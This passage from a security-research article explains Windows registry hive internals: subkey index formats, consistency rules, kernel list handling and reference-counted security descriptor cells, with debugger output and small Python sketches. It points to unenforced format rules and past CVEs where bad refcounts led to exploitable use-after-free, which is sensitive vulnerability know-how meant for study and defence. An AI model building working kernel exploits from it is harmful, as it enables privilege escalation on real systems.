    0: kd> dx -id 0,0,ffffbd044acf6040 -r1 (*((ntkrnlmp!_CM_KEY_REFERENCE *)0xffff800f88ada338))

    (*((ntkrnlmp!_CM_KEY_REFERENCE *)0xffff800f88ada338))                 [Type: _CM_KEY_REFERENCE]

        [+0x000] KeyCell          : 0x20 [Type: unsigned long]

        [+0x008] KeyHive          : 0xffff800f88a8e000 [Type: _HHIVE *]


    We can now translate this information into the cell's virtual address, and take a peek into it with !reg knode and !reg keyinfo:

    0: kd> !reg cellindex 0xffff800f88a8e000 0x20

    Map = ffff800f88adc000 Type = 0 Table = 0 Block = 0 Offset = 20

    MapTable     = ffff800f88ade000 

    MapEntry     = ffff800f88ade000 

    BinAddress = ffff800f896e8009, BlockOffset = 0000000000000000

    BlockAddress = ffff800f896e8000 

    pcell:  ffff800f896e8024

    0: kd> !reg knode ffff800f896e8024

    Signature: CM_KEY_NODE_SIGNATURE (kn)

    Name                 : ROOT

    ParentCell           : 0x318

    Security             : 0x78 [cell index]

    Class                : 0xffffffff [cell index]

    Flags                : 0x2c

    MaxNameLen           : 0x26

    MaxClassLen          : 0x0

    MaxValueNameLen      : 0x0

    MaxValueDataLen      : 0x0

    LastWriteTime        : 0x 1db2b94:0xe031a530

    0: kd> !reg keyinfo 0xffff800f88a8e000 ffff800f896e8024

    KeyPath         \REGISTRY\MACHINE\SYSTEM

    [SubKeyAddr]         [SubKeyName]

    ffff800f896e8174     ActivationBroker

    ffff800f896e964c     ControlSet001

    ffff800f89f0e8a4     DriverDatabase

    ffff800f89f999c4     HardwareConfig

    ffff800f89f9a314     Input

    ffff800f89f9a3dc     Keyboard Layout

    ffff800f89f9a43c     Maps

    ffff800f89f9a674     MountedDevices

    ffff800f89f9ab64     ResourceManager

    ffff800f89f9abc4     ResourcePolicyStore

    ffff800f89f9ac2c     RNG

    ffff800f89f9addc     Select

    ffff800f89f9aed4     Setup

    ffff800f89f9b7d4     Software

    ffff800f89f9d1f4     State

    ffff800f89f9d24c     WaaS

    ffff800f89fabc8c     WPA

    [SubKeyAddr]         [VolatileSubKeyName]

    ffff800f88b91024     CurrentControlSet

     Use '!reg keyinfo ffff800f88a8e000 <SubKeyAddr>' to dump the subkey details

    [ValueType]         [ValueName]                   [ValueData]

     Key has no Values


    We have indeed ended up at the root key of the SYSTEM hive, which has a standard key node signature ('nk'), the predefined "ROOT" name, a valid security descriptor, a list of subkeys, and so on.

    Overall, link nodes are an interesting implementation detail of the registry that are worth keeping in mind. However, considering their relative simplicity and the fact that they are hidden away even from very low-level mechanisms like Registry Callbacks, they are of limited significance to system security. The lone vulnerability I found related to them, CVE-2023-21747, resulted in a use-after-free due to improper cleanup of the exit node when faced with an out-of-memory condition.

    Subkey indexes

    Operations performed on subkey lists are some of the most common ones – they are involved whenever a key is opened, created, deleted, renamed or enumerated, which constitutes a majority of actions involving the registry at runtime. It is for this reason that subkey lists have seen the most evolution throughout the subsequent versions of the regf format. As the interface was getting adopted by more and more applications in Windows NT and later systems, Microsoft developers could collect data on the typical usage patterns and devise adequate optimizations to speed these operations up. In this section, we will have a deeper look into how subkey indexes are formatted in the hives, and how the different types of operations affect them.

    By way of introduction, subkey indexes are data structures storing lists of descendant keys relative to a parent key, referenced through the _CM_KEY_NODE.SubKeyLists[...] cell indexes. During hive load, the value at index 0 of the array may either be a subkey index, or HCELL_NIL if there are no subkeys; index 1 must always be equal to HCELL_NIL, as by definition there are no volatile subkeys on disk. The high-level concept behind the subkey index is that it is a linear list of key node cell indexes, which must efficiently support the following operations (from most to least commonly used, in my subjective opinion):

    1. Finding a key by name,
    2. Finding a key by index on the list,
    3. Adding a new key to the list,
    4. Deleting a key from the list.

    Regardless of the underlying representation of the list, it is always stored in a lexicographical order, reducing the lookup-by-name time from linear to logarithmic by using binary search. Let's now look into the specific structures used in registry hives to implement this functionality.
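    As a sketch of the lookup-by-name operation, a case-insensitive binary search over the sorted list might look as follows (assumption: uppercasing with str.upper() and encoding as UTF-16-BE approximate the kernel's case-insensitive comparison of 16-bit code units):

```python
def sort_key(name):
    # Uppercase for case-insensitivity, then encode as UTF-16-BE so
    # that bytewise comparison matches 16-bit code-unit comparison.
    return name.upper().encode("utf-16-be")

def find_subkey(sorted_names, wanted):
    """Binary search over a lexicographically sorted subkey list;
    returns the index of the match, or None if the key is absent."""
    lo, hi, w = 0, len(sorted_names), sort_key(wanted)
    while lo < hi:
        mid = (lo + hi) // 2
        if sort_key(sorted_names[mid]) < w:
            lo = mid + 1
        else:
            hi = mid
    if lo < len(sorted_names) and sort_key(sorted_names[lo]) == w:
        return lo
    return None

subkeys = sorted(["wombat", "🐂", "HIPPO", "ant", "ocelot"], key=sort_key)
print(find_subkey(subkeys, "hippo"))  # 1 (case-insensitive hit)
print(find_subkey(subkeys, "lion"))   # None
```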

    Index leaves

    Index leaves are the most basic type of a subkey list, which has been supported since the first iteration of the regf format and consists of just three members: the signature (0x696C, 'li'), number of entries (16-bit), and an inline, variable-length list of the cell indexes. The corresponding Windows kernel structure is _CM_KEY_INDEX:

    0: kd> dt _CM_KEY_INDEX

    nt!_CM_KEY_INDEX

       +0x000 Signature        : Uint2B

       +0x002 Count            : Uint2B

       +0x004 List             : [1] Uint4B


    Given the Count field range, the index leaf can store up to 65535 subkeys. It is the most compact one in terms of disk/memory consumption, but it provides somewhat poor cache locality, because every key referenced during the lookup must be accessed in memory in order to read its name from _CM_KEY_NODE.Name. Nevertheless, index leaves are still commonly used in all versions of Windows up to this day.

    As an example, let's consider a key with five subkeys named "wombat", "🐂", "HIPPO", "ant", and "ocelot". An index leaf of such a key could look like this:

    Diagram showing a key with five subkeys, as described in the sentence preceding this image

    This illustrates that entries in the list are indeed stored in a sorted manner, and in a case-insensitive way – "ant" goes before "HIPPO" even though 'H' (0x48) < 'a' (0x61). However, this logic applies to comparisons only, and otherwise the letter casing specified during key creation is preserved and visible to registry users. Finally, the Unicode ox symbol is placed last on the list, because it is encoded as U+D83D U+DC02, and 0xD83D is greater than any of the ASCII characters in the other names.
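    The ordering from the diagram can be reproduced with a few lines of Python (caveat: str.upper() only approximates the kernel's internal upcase table):

```python
names = ["wombat", "🐂", "HIPPO", "ant", "ocelot"]

# Uppercase for case-insensitivity, then encode as UTF-16-BE so that
# bytewise comparison is equivalent to comparing 16-bit code units:
# the ox's surrogate pair (0xD83D 0xDC02) sorts after all ASCII names.
ordered = sorted(names, key=lambda s: s.upper().encode("utf-16-be"))
print(ordered)  # ['ant', 'HIPPO', 'ocelot', 'wombat', '🐂']
```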

    Fast leaves

    Fast leaves are slightly younger than index leaves, introduced in regf version 1.3 in 1995 (Windows NT 4.0). As hive versions 1.2 and below have been long obsolete, that means that fast leaves are universally supported in every modern version of Windows at the time of this writing. As the name suggests, they are meant to be faster than their predecessors, by including up to four initial characters of each subkey in the list as a "hint" next to the cell index of the key. This allows the kernel to execute the first four iterations of the string comparison loop using data only from the fast leaf and without referring to the corresponding node, which addresses the aforementioned issue of poor cache locality in index leaves. We expect this optimization to be effective in most real-life scenarios, as most keys consist of ASCII-only characters and differ from each other within the first four symbols.

    The specific logic of generating the 32-bit hint from a string can be found in the internal CmpGenerateFastLeafHintForUnicodeString kernel function, but it boils down to the following steps:

    1. Set the initial hint variable to 0.
    2. In a loop of min(4, length) iterations:
       a. If the n-th character is greater than 0xFF, break.
       b. Otherwise, add the character (with its original case) to the hint.
    3. Return the hint to the caller.

    For example, the hint for "ant" is "ant\0", the hint for "HIPPO" is "HIPP", and the hint for "🐂" is "\0\0\0\0" (the first character is non-ASCII, so the whole hint is simply zero).
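    The steps above can be sketched in Python (the exact byte order in which the characters are packed into the 32-bit hint is my assumption, not taken from the kernel binary):

```python
def fast_leaf_hint(name: str) -> int:
    """Sketch of the hint generation described above: up to four
    initial characters, stopping early at the first one that does
    not fit in 8 bits. Packing the n-th character into the n-th
    byte is an assumption about the exact layout."""
    hint = 0
    for n, ch in enumerate(name[:4]):
        if ord(ch) > 0xFF:
            break
        hint |= ord(ch) << (8 * n)
    return hint

print(hex(fast_leaf_hint("ant")))    # 'a' | 'n'<<8 | 't'<<16 -> 0x746e61
print(hex(fast_leaf_hint("HIPPO")))  # only "HIPP" contributes
print(fast_leaf_hint("🐂"))          # first char is non-8-bit -> 0
```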

    When it comes to the structure layout of the fast leaf, it is basically the same as the index leaf, but it has a different signature ('lf') and twice as many entries in the List array due to the addition of hints. There doesn't seem to be any structure definition corresponding specifically to fast leaves in the public symbols, which either means that the structure is a non-public one, or it is also accessed via _CM_KEY_INDEX in the source code, but through references such as Index.List[2*n] instead of Index.List[n]. An illustration of a fast leaf containing the five example subkeys is shown below:

    Fast Leaf diagram containing the five example subkeys

    Hash leaves

    Hash leaves are the third and last (for now) iteration of the subkey index format, introduced in Windows XP in 2001 (regf version 1.5). They have exactly the same data layout as fast leaves, but are characterized by the 'lh' signature, and the 32-bit hint is a simple hash of the entire string instead of an inline representation of the first four characters. The specific hashing algorithm is implemented in the internal CmpHashUnicodeComponent function, and can be summarized with the following steps:

    1. Start with a hash equal to 0.
    2. For every character in the string:
       a. Hash = (Uppercase(Character) + 37 * Hash) % 0x100000000
    3. Return the hash to the caller.

    The main benefit of this approach is that it works equally well with ASCII and non-ASCII strings, and it covers the entire name and not just a prefix, further limiting the number of necessary references to the subkey nodes during key lookup. However, you may notice that a full-string hash isn't really compatible with the concept of binary search, and indeed, whenever a hash leaf is used, the kernel performs a linear search instead of a binary one, as can be seen in the corresponding CmpFindSubKeyByHashWithStatus function. In theory, this could lead to iterating through 65535 keys (the maximum number of entries in a hash leaf), but in practice, the kernel makes sure that a hash leaf is never longer than 1012 elements. This is okay for performance, because when more subkeys are associated with a key, a second-level data structure comes into play (the root index, see the next section), and that one is always traversed with a binary search. Overall, it seems possible that the cache friendliness of the hash leaf makes up for its theoretically worse lookup complexity, especially in the average case.
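    The algorithm translates directly into Python (str.upper() is only an approximation of the kernel's upcase table, so results for some non-ASCII characters may differ):

```python
def registry_name_hash(name: str) -> int:
    """Reimplementation of the hashing steps described above."""
    h = 0
    for ch in name:
        u = ch.upper()
        # Guard against one-to-many case mappings (e.g. 'ß' -> 'SS'),
        # which the kernel's per-character upcase table cannot produce.
        h = (ord(u if len(u) == 1 else ch) + 37 * h) & 0xFFFFFFFF
    return h

# The hash covers the whole name and is case-insensitive:
print(hex(registry_name_hash("CurrentControlSet")))
print(registry_name_hash("SYSTEM") == registry_name_hash("system"))  # True
```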

    A corresponding diagram of a hash leaf data layout is shown below:

    Image showing hash leaf data layout as described above

    Root indexes

    Each key in the registry can potentially have many thousands of subkeys, but having them stored in one very long list (such as a single index, fast or hash leaf) could lead to poor performance for some operations. For example, whenever a new key is inserted into the alphabetically sorted list, the portion of the list after the new key has to be moved in memory to make room for the new item. Similar CPU-heavy situations could arise when extending the dynamically sized array in the hive, and potentially having to copy its entire contents to a new cell if the existing one doesn't have any free space behind it. In the worst case scenario, this would have a complexity of O(n) per operation, which is too slow for such an important system mechanism as the Windows registry.

    It is likely for this reason that whenever the subkey list becomes longer than 1012 elements for the first time, a second-level index called the root index is inserted into the data structure. This has the goal of splitting a single long list into several shorter ones, which are easier to manage in memory. Root indexes cannot be nested or referenced recursively by one another: a subkey list may either be non-existent, a single leaf-type list, or a single root index pointing at leaf-type lists (in other words, the list may be 0, 1 or 2 levels deep).

    The root index has existed for as long as the index leaves have: since the very first regf version 1.0 in Windows NT 3.1 Pre-Release. It also has the same layout represented by the _CM_KEY_INDEX structure, which consists of a signature ('ri' in this case), a 16-bit count and an array of cell indexes pointing at leaf-type lists, without any additional hints. An example diagram of a two-level subkey index containing five keys is shown below:

    An image showing an example diagram of a two-level subkey index containing five keys
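    A toy model of this two-level scheme, including the leaf split at the 1012-entry limit mentioned above, could look like this (hypothetical Python lists standing in for hive cells; the real kernel splits cells in hive memory and binary-searches the root index):

```python
LEAF_MAX = 1012  # maximum leaf length enforced by the kernel

class SubkeyIndex:
    """Toy two-level subkey index: a 'root index' holding sorted
    leaf lists, never nested deeper than two levels (sketch)."""
    def __init__(self):
        self.leaves = [[]]

    def insert(self, name):
        key = name.upper()
        # Pick the leaf whose range covers the new name (linear scan
        # here for simplicity).
        for i, leaf in enumerate(self.leaves):
            if i == len(self.leaves) - 1 or key <= leaf[-1].upper():
                break
        pos = 0
        while pos < len(leaf) and leaf[pos].upper() < key:
            pos += 1
        leaf.insert(pos, name)
        if len(leaf) > LEAF_MAX:
            # Split an oversized leaf in two, keeping the index flat.
            mid = len(leaf) // 2
            self.leaves[i:i + 1] = [leaf[:mid], leaf[mid:]]

    def names(self):
        return [n for leaf in self.leaves for n in leaf]

idx = SubkeyIndex()
for n in range(2500):
    idx.insert("Key%04d" % n)
print(len(idx.leaves), max(len(leaf) for leaf in idx.leaves))
```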

    Fundamental subkey list consistency requirements

    There is a set of some very basic format consistency requirements concerning subkey indexes, which must be always met for any active hive in the system, regardless of whether it has been loaded from disk or created from scratch at runtime. These are the minimum set of rules for this data structure to be considered as "valid", and they are tightly connected to the memory safety guarantees of the kernel functions that operate on them. They are as follows:

    • The signature of each subkey list cell must be correctly set to its corresponding type, one of 'li', 'lf', 'lh' or 'ri'.
    • The size of the cell must be greater than or equal to the number of bytes required to store all of the elements in the "List" array, according to the value of the "Count" member.
    • A subkey list cell may never be empty, i.e. _CM_KEY_INDEX.Count mustn't be zero (whenever it becomes zero, it should be freed and un-referenced in any of the other hive cells).
    • The number of subkeys cached in the key node (_CM_KEY_NODE.SubKeyCounts[x]) must be equal to the number of subkeys defined in the subkey index (i.e. the sum of _CM_KEY_INDEX.Count of its index leaves).
    • The cell indexes stored in _CM_KEY_NODE.SubKeyLists[x] must either be HCELL_NIL (if SubKeyCounts[x] is zero), or point to a root index or one of the three leaf types. Additionally, SubKeyCounts[1] must be zero and SubKeyLists[1] must be HCELL_NIL on hive load.
    • All cell indexes stored in a root index must point at valid leaf indexes.
    • All cell indexes stored in leaf indexes must point at valid key nodes.
    • All hints specified in the fast leaves and hash leaves must be consistent with the names of their corresponding keys.
    • The overall subkey list must be sorted lexicographically, i.e. the name of each n+1th subkey must be strictly greater than the name of the nth subkey. This also entails that there mustn't be any duplicates in the subkey list, with regard to either the cell index or the subkey name.
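    Several of these invariants translate naturally into code. The following sketch checks a few of them against a simplified in-memory model of a subkey index (hypothetical helper names and data layout, not the kernel's implementation):

```python
# Simplified in-memory model: a subkey index is a list of leaves, and each
# leaf is a list of (cell_index, name) tuples. This is an illustrative
# sketch of the invariants, not the kernel's actual code.

def validate_subkey_index(leaves, cached_count):
    """Check a few fundamental subkey-list consistency requirements."""
    # A subkey list cell may never be empty.
    if not leaves or any(len(leaf) == 0 for leaf in leaves):
        return False
    # The count cached in the key node must match the sum of leaf counts.
    if cached_count != sum(len(leaf) for leaf in leaves):
        return False
    # The overall list must be sorted with strictly increasing names
    # (case-insensitive, as registry name comparisons are).
    names = [name.upper() for leaf in leaves for _, name in leaf]
    if any(a >= b for a, b in zip(names, names[1:])):
        return False
    # No duplicate cell indexes anywhere in the index.
    cells = [cell for leaf in leaves for cell, _ in leaf]
    return len(cells) == len(set(cells))

# A two-leaf index containing five keys, analogous to the diagram above.
index = [[(0x120, "Apple"), (0x1A8, "Banana")],
         [(0x230, "Cherry"), (0x2B8, "Mango"), (0x340, "Peach")]]
assert validate_subkey_index(index, 5)
assert not validate_subkey_index(index, 4)   # stale cached count
assert not validate_subkey_index([[]], 0)    # empty leaf is never allowed
```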

    Notably, there are also some constraints that seem very natural, but are in fact not enforced by the Windows kernel:

    • There is no requirement that the format of a leaf-type index must be consistent with the version of the hive: instead, every one of li/lf/lh types are accepted for every hive version 1.3 – 1.6. The most glaring example of this behavior is that hash leaves are allowed in hive versions 1.3 and 1.4, even though they were historically only introduced in version 1.5 of the format.
    • There is no requirement that all the leaf indexes referenced by a root index are all of the same type. In fact, a single subkey list may consist of an arbitrary combination of index leaves, fast leaves and hash leaves, and the kernel must handle such situations gracefully.
    • Beyond the fact that none of the actively used subkey indexes may be empty, there are no limitations with regards to how the subkeys are laid out in the data structure. For example, the existence of a root index doesn't automatically indicate that there are many subkeys on the list: there may as well be a single root index, pointing to a single leaf, containing a single subkey. It is also allowed for several leaves that are part of a single root index to have wildly different counts, with some single-digit ones coexisting with others around the 64K mark. The kernel doesn't ensure any advanced "balancing" of the subkey index by default – it does split large leaves into smaller ones, but only while adding a new subkey, and not during the loading of an existing hive.

    Three examples of kernel vulnerabilities that were directly related to the handling of subkey lists are: CVE-2022-37956 (integer overflows in registry subkey lists leading to memory corruption), CVE-2022-38037 (memory corruption due to type confusion of subkey index leaves in registry hives) and CVE-2024-26182 (subkey list use-after-free due to mishandling of partial success in CmpAddSubKeyEx). I personally find the first one (CVE-2022-37956) particularly interesting, because the hive memory corruption could be triggered with the right sequence of API calls, or even just command-line reg.exe tool invocations. Granted that the number of required operations was quite high (around 66 million), but it still goes to show that being intimately familiar with the inner workings of the target software may open new avenues of exploitation that would otherwise not be available. For a detailed explanation of the subkey list management logic, see the next section.

    Internal Windows logic of handling subkey lists

    On top of the requirements and restrictions imposed by the regf format itself, there are some further characteristics of most registry hives found on real systems, caused by some decisions implemented in the logic of the Windows kernel. The most important thing to note is that, as mentioned above, the kernel operates on any subkey list lazily, only when there is a need to do so due to a key being added/deleted in the registry. Therefore, a weirdly formatted (but adhering to the bare regf requirements) subkey index will remain in this state after loading, for as long as a client application doesn't decide to change it.

    Most of the relevant high-level logic of handling subkey lists takes place when adding new keys, and is illustrated in the flow chart below:

    Complex flow chart describing the high-level logic of handling subkey lists when adding new keys

    The general high-level function that implements the above logic in the Windows kernel is CmpAddSubKeyEx, which then calls a few helper routines with mostly self-descriptive names: CmpAddSubKeyToList, CmpSelectLeaf, CmpSplitLeaf and CmpAddToLeaf. Compared to addition, the process of deleting a key from the list is very straightforward, and is achieved by removing it from the respective leaf index, freeing the leaf if it was the last remaining element, and freeing the root index if it was present and the freed leaf was its last remaining element. There are no special steps being taken other than the strictly necessary ones to implement the functionality.
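    As a rough mental model of this flow, the following sketch mimics the select/add/split sequence on plain sorted lists. MAX_LEAF is an arbitrary illustrative threshold, not the kernel's actual split limit, and the helper names only loosely mirror the kernel routines:

```python
# A much-simplified model of the add-subkey flow (CmpAddSubKeyEx and
# helpers): pick a leaf, insert the name keeping it sorted, and split the
# leaf if it grows too large. Purely illustrative.
import bisect

MAX_LEAF = 4   # arbitrary threshold for this sketch

def add_subkey(root, name):
    """root: list of leaves, each leaf a sorted list of names."""
    if not root:                        # empty subkey list: create first leaf
        root.append([name])
        return
    # Select the leaf whose range the new name falls into (cf. CmpSelectLeaf).
    i = 0
    while i < len(root) - 1 and name > root[i][-1]:
        i += 1
    bisect.insort(root[i], name)        # cf. CmpAddToLeaf: keep the leaf sorted
    if len(root[i]) > MAX_LEAF:         # cf. CmpSplitLeaf: split oversized leaf
        leaf = root.pop(i)
        mid = len(leaf) // 2
        root[i:i] = [leaf[:mid], leaf[mid:]]

root = []
for key in ["Delta", "Alpha", "Echo", "Bravo", "Charlie", "Foxtrot"]:
    add_subkey(root, key)
# All names remain globally sorted across the leaves.
flat = [n for leaf in root for n in leaf]
assert flat == sorted(flat)
```

    Note that, in line with the observations above, splitting only ever happens while adding a key; nothing rebalances an existing layout.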

    Given the above, we can conclude that registry hives created organically by Windows generally adhere to the following set of extra rules:

    • The leaf types being used are in line with the version of the hive: index and fast leaves for versions ≤1.4, and hash leaves for versions ≥1.5.
    • All leaves within a single index root have the same type.
    • Index leaves never contain more than 1012 elements.
    • Once a root index is created for a key, it is never downgraded back to a single leaf index other than through the deletion of all subkeys, and creating a new one starting from an empty subkey list.

    Security descriptors

    Security descriptors play a central role in enforcing access control to the information stored in the registry. Their significance is apparent through the fact that they are the only mandatory property of registry keys, as opposed to classes, values and subkeys which are all optional. At the same time, large groups of keys typically share the same security settings, so it would make little sense to store a separate copy of the data for every one of them. For example, in a default installation of Windows 11, the SOFTWARE hive includes around 250,000 keys but only around 500 unique security descriptors. This is why they are the only type of cell in the hive that can be associated with multiple keys at the same time. By only storing a single instance of each unique descriptor in the hive, the system saves significant disk and memory space. However, this efficiency requires careful management of each descriptor's usage through reference counting, which ensures they can be safely freed when no longer needed.

    When loading a hive, the kernel enumerates all of its security descriptors without having to traverse the entire key tree first. In order to make this possible, security descriptors in the stable space are organized into a doubly-linked list, starting at the descriptor of the root key. Internal consistency of this list is mandatory – if any inconsistencies are found, it is reset to become a single-entry list with just the root security descriptor and nothing else. If the root security descriptor itself is corrupted, the hive is deemed to be in an unrecoverable state and rejected completely.

    While traversing the global list, the kernel also verifies that the binary encoding of the security descriptors is valid and safe to pass to internal security-related functions later in time. In the hives, descriptors are formatted as self-contained blobs of bytes adhering to the SECURITY_DESCRIPTOR_RELATIVE structure layout. Compared to other hive cells (key nodes etc.), the internal format of security cells is relatively complex: it is variable in size and contains multiple sub-structures (SIDs, ACLs, ACEs), length indicators and internal offsets. To detect any potential corruption early, the RtlValidRelativeSecurityDescriptor function must succeed for every descriptor in a newly loaded hive, otherwise the previously discussed fallback logic takes place.

    The last step in the security descriptor validation process is to make sure that the reference counts specified in the hive are equal to the actual number of references from registry keys. This is achieved by re-counting the references when traversing the key tree structure of the hive, and later checking if the values found in _CM_KEY_SECURITY.ReferenceCount are in line with the regenerated counts. If the two values are unequal, the refcount in the security cell is adjusted to reflect the correct number of references. This is critical for system security, because operating on an invalid refcount – especially an inadequately small one – may directly lead to exploitable memory corruption conditions.

    There have been historical vulnerabilities related to each of the three fundamental aspects of security descriptor consistency outlined above: the integrity of the linked list, the validity of the binary encoding, and the correctness of the reference counts.

    A high-level illustration of a security descriptor linked list consisting of three elements is shown in the diagram below:

    A high-level illustration of a security descriptor linked list consisting of three elements

    Security cell format

    Let's now have a look at the specific layout of the security cells. They are represented by the _CM_KEY_SECURITY structure, whose definition is shown in the WinDbg format below:

    0: kd> dt _CM_KEY_SECURITY

    nt!_CM_KEY_SECURITY

       +0x000 Signature        : Uint2B

       +0x002 Reserved         : Uint2B

       +0x004 Flink            : Uint4B

       +0x008 Blink            : Uint4B

       +0x00c ReferenceCount   : Uint4B

       +0x010 DescriptorLength : Uint4B

       +0x014 Descriptor       : _SECURITY_DESCRIPTOR_RELATIVE
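
    Based on the offsets in the dump above, the fixed 0x14-byte header of a security cell can be parsed with a few lines of Python. The blob below is a hand-crafted example for illustration, not real hive data:

```python
import struct

# Parse the fixed 0x14-byte header of a security ('sk') cell, following
# the field offsets in the WinDbg dump: two 16-bit fields followed by four
# 32-bit fields, all little-endian.
def parse_key_security(raw):
    sig, _reserved, flink, blink, refcount, desc_len = \
        struct.unpack_from("<HHIIII", raw, 0)
    return {
        "Signature": sig,                # 0x6B73 ('sk'), informational only
        "Flink": flink, "Blink": blink,  # links in the security descriptor list
        "ReferenceCount": refcount,
        "DescriptorLength": desc_len,
        "Descriptor": raw[0x14:0x14 + desc_len],
    }

# Hand-crafted single-entry list: Flink/Blink point back at the cell itself.
raw = struct.pack("<HHIIII", 0x6B73, 0, 0x80, 0x80, 2, 4) + b"\x00" * 4
sk = parse_key_security(raw)
assert sk["Signature"] == 0x6B73
assert sk["Flink"] == sk["Blink"] == 0x80
assert len(sk["Descriptor"]) == 4
```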


    Each of its fields is discussed in more detail in the following subsections.

    Signature

    The magic bytes of this cell type, equal to 0x6B73 ('sk'). It exists for informational purposes only, but isn't used for anything at runtime – it isn't even verified on hive load, and can therefore be anything in a binary-controlled hive.

    Reserved

    An unused field that may contain arbitrary data; never accessed by the kernel.

    Flink and Blink

    As discussed earlier, these are the forward and backward links in the security descriptor list. They must always be kept in a valid state. In a single-element list, Flink/Blink point at themselves – that is, at the security descriptor they are both part of.

    ReferenceCount

    This single field was arguably responsible for the most registry-related vulnerabilities out of all of the hive structures. It is a 32-bit unsigned integer that expresses the number of objects that actively rely on this security descriptor, which mostly means the key nodes associated with it, but not only. Whenever this member gets out of sync with the real number of references, it may lead to serious memory corruption primitives, so it is very important that the kernel ensures its correct value both on hive load and during any subsequent operations. The two prevalent risks are that:

    • The refcount gets too small: when this happens, it is possible that the cell gets freed while some objects still hold active references to it. This leads to a straightforward use-after-free scenario, and in my experience, it is easily exploitable by a local attacker.
    • The refcount gets too large: this situation doesn't immediately lead to memory corruption, but let's remember that the structure member has a limited, 32-bit width. If an attacker were able to indiscriminately increment the counter without real references to back it up, they could eventually get it to the maximum uint32 value, 0xFFFFFFFF. For many years, the Windows kernel didn't implement any protection against registry refcount integer overflows, so another incrementation of the field after 0xFFFFFFFF would wrap it back to zero, which brings us to the previous scenario of an inadequately small count. However, following some bug reports and discussions, Microsoft has gradually added overflow protection in the relevant, internal functions, starting in April 2023 and eventually landing the last missing check in November 2024. Thanks to this effort, I believe that as I am writing this, security descriptor refcount leaks should no longer be an exploitable condition.
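    The wraparound hazard can be illustrated in a few lines. This is a conceptual sketch of the unchecked versus hardened behavior, not the kernel's code:

```python
# 32-bit refcount wraparound, made explicit with masking. Without an
# overflow check, one more increment past 0xFFFFFFFF snaps the count back
# to zero, re-creating the "refcount too small" scenario.
MASK32 = 0xFFFFFFFF

def unchecked_increment(refcount):
    return (refcount + 1) & MASK32

def checked_increment(refcount):
    # The hardened behavior: refuse to increment at the saturation point.
    if refcount == MASK32:
        raise OverflowError("security descriptor refcount overflow")
    return refcount + 1

assert unchecked_increment(0xFFFFFFFF) == 0   # wraps: use-after-free risk
assert checked_increment(5) == 6
try:
    checked_increment(0xFFFFFFFF)
    assert False
except OverflowError:
    pass
```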

    Under most circumstances, the value of the refcount is somewhere between 1 and ~24.4 million (the maximum number of keys in a hive given the space constraints). However, it is interesting to note that it might be legitimately set to a greater value. Consider the following: immediately after loading a hive, all security refcounts are exactly equal to the number of keys associated with them. But key nodes globally visible in the registry tree are not the only ones that can reference security cells; there may also be keys that have been created in the scope of a transaction and not committed yet, as well as pending, transacted operations of changing the security properties of a key (marked by the UoWAddThisKey and UoWSetSecurityDescriptor enums of type UoWActionType). They too may increase the refcount value beyond what would normally be possible with just regular, non-transacted keys. This phenomenon has been discussed in detail in the CVE-2024-43641 bug report.

    Overall, reference counts are of great importance to system security, and every registry operation that involves it deserves a thorough security assessment.

    DescriptorLength

    This is the length of the security descriptor data (i.e. the size of the Descriptor array) expressed in bytes. It's worth noting that the format doesn't force it to be the minimum length sufficient to store the binary blob. This means that the overall cell length must be greater than or equal to DescriptorLength + 20 (i.e. the declared length of the descriptor plus the _CM_KEY_SECURITY header), and in turn DescriptorLength must be greater than or equal to the actual size of the descriptor. Both cases of the cell size or the DescriptorLength having non-optimal values are accepted by the kernel, and the extra bytes are ignored.
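    In other words, the size relationships form a simple chain, which can be sketched as follows (an illustrative helper, using the 0x14-byte header size from the structure definition above):

```python
# Size-consistency sketch for a security cell: the cell must be large
# enough for the 0x14-byte _CM_KEY_SECURITY header plus the declared
# DescriptorLength, and DescriptorLength must in turn cover the actual
# descriptor. Extra slack bytes in either are simply ignored.
CM_KEY_SECURITY_HEADER = 0x14

def security_cell_sizes_ok(cell_size, descriptor_length, actual_descriptor_size):
    if cell_size < CM_KEY_SECURITY_HEADER + descriptor_length:
        return False
    return descriptor_length >= actual_descriptor_size

assert security_cell_sizes_ok(0x40, 0x20, 0x20)      # tight fit, accepted
assert security_cell_sizes_ok(0x80, 0x28, 0x20)      # slack in both, accepted
assert not security_cell_sizes_ok(0x20, 0x20, 0x20)  # cell too small
```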

    Descriptor

    This variable-length array stores the actual security descriptor in the form of the SECURITY_DESCRIPTOR_RELATIVE structure. It doesn't necessarily have to be formatted in the most natural way, and the only requirement is that it successfully passes the RtlValidRelativeSecurityDescriptor check with the RequiredInformation argument set to zero. This means, for example, that the Owner/Group/Sacl/Dacl components may be spread out in memory and have gaps in between them, or conversely, that their representations may overlap. This was one of the main contributing factors in CVE-2022-35768, but the fix was to more accurately calculate the length of irregularly-encoded descriptors, and the freedom to structure them in non-standard ways has remained. It is even possible to use a completely empty descriptor without any owner or access control entries, and such a construct will be acknowledged by the system, too.

    Another somewhat interesting fact is that security descriptors are meant to be deduplicated, so naturally whenever a user assigns a security descriptor that already exists in the hive, it is simply reused and its reference count is incremented. However, again, the format (or rather its canonical implementation in Windows) doesn't force the uniqueness requirement upon the security descriptors in hives loaded from disk. So, even though they would be never created by the OS itself, multiple identical copies of a descriptor are allowed in specially crafted hives and may co-exist without (seemingly) causing any issues for the kernel.

    The access rights defined by the security descriptors are based on permissions specific to the registry and its operations, so there is an access mask dedicated to creating keys (KEY_CREATE_SUB_KEY), reading values (KEY_QUERY_VALUE), writing values (KEY_SET_VALUE), and so on. They all have self-descriptive names and are well-documented in Registry Key Security and Access Rights, so we won't spend more time discussing them here.

    Security descriptors of volatile keys

    Similarly to every other property of a registry key, the storage type of a security descriptor always matches the type of its associated key(s). This means that a stable key will always use a stable descriptor, and a volatile key – a volatile descriptor. It is the only "exception" to the rule that security descriptors are deduplicated and unique within the scope of the hive. If there are two keys with identical security settings but different storage types, they will reference two distinct security descriptor cells via their _CM_KEY_NODE.Security fields, one with the highest bit set and the other with the bit clear. The descriptors stored on both sides are subject to the same rules with regards to reference counting, allocating and freeing.

    Furthermore, we have previously discussed how all security descriptors in a hive are connected in one global doubly-linked list, but this only applies to the descriptors in the stable space. The functionality is needed so that the descriptors can be enumerated by the kernel when loading a hive from disk, and since volatile descriptors are in-memory only and disappear together with their corresponding keys on hive unload or a system shutdown, there is no need to link them together. The internal CmpInsertSecurityCellList function takes this into account, and points the Flink/Blink fields at themselves, making each volatile descriptor a single-entry list in order to keep it compatible with the list linking/unlinking code. This behavior is illustrated in the diagram below, with two volatile security descriptors each being in their own pseudo-list:

    Diagram described in the paragraph above, showing two security descriptors capybara and sloth

